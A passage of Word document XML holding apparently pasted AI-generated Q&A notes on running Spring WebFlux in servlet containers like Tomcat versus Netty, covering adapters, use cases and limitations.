          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but instead leverages the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet 3.1 asynchronous, non-blocking support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the ServletHttpHandlerAdapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC8A500" w14:textId="77777777" w:rsidR="00053B7F"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5519D94">
          <v:rect id="_x0000_i2336" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6EC72B" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7F"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Two Server Options for WebFlux:</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64"/>
        <w:gridCol w:w="7440"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="2F68CFDD" w14:textId="77777777" w:rsidTr="00053B7F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23DB921E" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7F"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Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3981460A" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7F"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="252DBFAD" w14:textId="77777777" w:rsidTr="00053B7F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62FB3024" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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ervlet-based (e.g., Tomcat, Jetty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5972D3A1" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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uns on servlet containers using non-blocking Servlet 3.1 APIs. Uses adapters internally to bridge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="5611E45C" w14:textId="77777777" w:rsidTr="00053B7F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="671F10CF" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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ctive server (Netty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD4C18C" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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ully non-blocking I/O and event-loop based. Preferred for full reactive stack performance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="077288B9" w14:textId="77777777" w:rsidR="00053B7F"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716F70D">
          <v:rect id="_x0000_i2337" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3D8E1" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7F"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Internal Working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D40801" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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When running on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5943E727" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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Uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet 3.1+ HttpServletRequest and HttpServletResponse</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07A660" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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raps these in a ServerHttpRequest and ServerHttpResponse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4986773B" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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Delegates request handling to HttpWebHandlerAdapter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469901C7" w14:textId="77777777" w:rsidR="00053B7F"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710A815">
          <v:rect id="_x0000_i2338" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E605FB" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7F"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Not Supported:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71807474" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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Traditional blocking Servlet containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like Tomcat 7 or older do </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> support Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68007329" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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Blocking servlet APIs (Spring MVC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are not used in WebFlux — they are mutually exclusive stacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744ED0D2" w14:textId="77777777" w:rsidR="00053B7F"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50CF8EE">
          <v:rect id="_x0000_i2339" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EADFBD5" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7F"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Use Cases for Running WebFlux on Tomcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A2D174" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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hen you're in a Spring Boot application and don’t want to use Netty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584A1606" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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hen deploying to environments where Tomcat is required or embedded by policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3BB794" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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o incrementally migrate a Spring MVC app to reactive (although partial mix is not recommended).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FE629C" w14:textId="77777777" w:rsidR="00053B7F"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DB6B15B">
          <v:rect id="_x0000_i2340" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819DD34" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7F"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Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2347E843" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maximum performance and full non-blocking capabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, prefer </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (spring-boot-starter-webflux defaults to it). Use Tomcat only if you have legacy requirements or infrastructure constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A61A0D" w14:textId="77777777" w:rsidR="00053B7F" w:rsidRPr="00B13F85" w:rsidRDefault="00053B7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et me know if you want a quick config example to switch between Netty and Tomcat for WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C82D9DF"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18309CF">
          <v:rect id="_x0000_i2341" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ECF0DD" w14:textId="31981828"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33" w:name="_Toc196308013"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If so, what are the limitations when running Spring WebFlux in a servlet container</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="533"/>
    </w:p>
    <w:p w14:paraId="043B47BF" w14:textId="76C7C4A2" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953AF"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Yes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux can run in a servlet container</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but there are several </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>limitations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to running it on a fully reactive server like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here’s a breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713C0A01" w14:textId="77777777" w:rsidR="005953AF"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64849CF">
          <v:rect id="_x0000_i2342" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758BB3B" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953AF"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Limitations of Running WebFlux on Servlet Containers (Tomcat/Jet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81"/>
        <w:gridCol w:w="8223"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="3654143B" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12138B72" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953AF"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Limitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D9530F" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953AF"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="19C215D2" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5298F499" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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1. Servlet API Constraints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50EC7144" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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Servlet containers use the Servlet 3.1+ non-blocking I/O API, which introduces </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>some blocking points</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> internally. It’s not as efficient or scalable as Netty’s event loop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="191214A7" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45CBE424" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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2. Thread-Per-Request Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39FC2487" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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Even though Servlet 3.1 supports async/non-blocking, servlet containers may still use </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>more threads</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> compared to the </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>event-loop model</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> of Netty.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="53420144" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65AF1AB0" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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3. Performance Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="099FD1D8" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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Additional </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>adapters/wrappers</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (like ServletHttpHandlerAdapter) are used to bridge WebFlux with the servlet API, which introduces </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>latency</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overhead</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="6557FC9C" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26377794" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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4. No Full Reactive Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38F3357E" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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Features like </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reactive socket communication</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WebSockets with backpressure</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> are </w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>limited</w:t>
            </w:r>
            <w:r w:rsidRPr="00B13F85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> in servlet-based environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="1FA6D2BE" w14:textId="77777777" w:rsidTr="005953AF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B82E4B4" w14:textId="77777777" w:rsidR="005953AF" w:rsidRPr="00B13F85" w:rsidRDefault="005953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5. Less Efficient Backpressure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
